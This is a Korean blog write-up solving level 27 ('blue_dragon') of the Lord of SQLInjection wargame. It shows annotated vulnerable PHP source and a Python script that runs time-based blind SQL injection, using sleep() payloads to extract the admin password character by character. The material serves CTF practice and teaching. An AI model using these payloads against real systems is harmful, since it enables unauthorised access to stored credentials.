[ LOS ] Lord of SQLInjection 27번 풀이(blue_dragon)

sangjun

·

2022. 1. 14. 00:35


 

문제소스

query : select id from prob_blue_dragon where id='' and pw=''

<?php
  // Challenge source for LOS "blue_dragon": a login lookup whose SQL is
  // assembled by interpolating raw GET parameters.  The comments below mark
  // the ordering defect the writeup relies on; they do not alter the code.
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // First filter: rejects "prob", "_" and "." (case-insensitive) in both
  // inputs.  It does not reject quotes, comment markers or SQL functions.
  if(preg_match('/prob|_|\./i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\./i', $_GET[pw])) exit("No Hack ~_~");
  // $_GET[id] and $_GET[pw] are spliced into the statement unescaped.  A
  // prepared statement with bound parameters is the fix; the regex filters
  // are not a substitute for it.
  $query = "select id from prob_blue_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  // The query is executed HERE, before the quote/backslash filter below, so
  // injected SQL runs regardless of that filter.  '@' suppresses errors, so a
  // failed query is silent.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // Second filter: rejects a single quote or a backslash, but only after the
  // query has already run.  It blocks the "Hello ..." output, not the query
  // itself, which is why a side channel such as response time (the sleep()
  // payload in the writeup) still leaks data.  Each true probe delays the
  // response by the sleep interval, which is visible in server timing logs.
  if(preg_match('/\'|\\\/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/\'|\\\/i', $_GET[pw])) exit("No Hack ~_~");
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  // Solve check: pw is passed through addslashes(), so quotes and backslashes
  // are escaped before this second query.  The check compares the stored pw
  // with the submitted one using loose (==) comparison.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_blue_dragon where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("blue_dragon");
  highlight_file(__FILE__);
?>

 

문제 분석 및 페이로드

1. 'No Hack' 필터(따옴표 검사)보다 쿼리가 먼저 실행되니까 Time Based SQLi

# Writeup script: time-based blind SQL injection against the LOS "blue_dragon"
# challenge.  Every request carries a condition wrapped in if(..., sleep(1), 1);
# a round-trip longer than one second is read as "condition true".  The
# threshold is hard-coded, so network jitter may produce a false reading, and
# each true probe delays the server response by at least one second.
import requests
import string
import time
# Challenge endpoint; the PHPSESSID below is the author's page-specific session.
URL="https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
# Candidate alphabet for the password: digits, letters and punctuation.
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kmo07vm0qujgagfi56vspjh5f8"}
passwd=""
print(brute)
length=-1  # stays -1 if no length probe exceeds the threshold
#find passwd Length
for i in range(100):
    # %26%26 is a URL-encoded "&&"; "or id='admin'" pins the row to admin.
    query=f"""?id=admin&pw=' or id='admin' %26%26 if(length(pw)={i},sleep(1),1)%23"""  # a bare length(pw) would also match guest's 4-character pw and give a wrong length.
    start=time.time()
    response=requests.get(URL+query,cookies=cookies)
    print(response.text)
    end=time.time()-start  # elapsed seconds, compared against the 1s sleep
    if end>1:
        length=i
        break

print(f"pass length is {length}")
# #find passwd
# If length stayed -1 this range is empty and passwd remains "".
for i in range(1,length+1):
    for ch in brute:
        # Timer starts before the query string is built here (unlike the
        # length loop above), so the measured interval includes that work.
        start=time.time()
        # Probe one character position: ord(mid(pw,i,1)) against ord(ch).
        query=f"""?id=admin&pw=' or id='admin' %26%26 if(ord(mid(pw,{i},1))={ord(ch)},sleep(1),1)%23"""
        response=requests.get(URL+query,cookies=cookies)
        end=time.time()-start
        print(query)
        if end>1:
            passwd+=ch
            break

print(f"passwd is {passwd}")

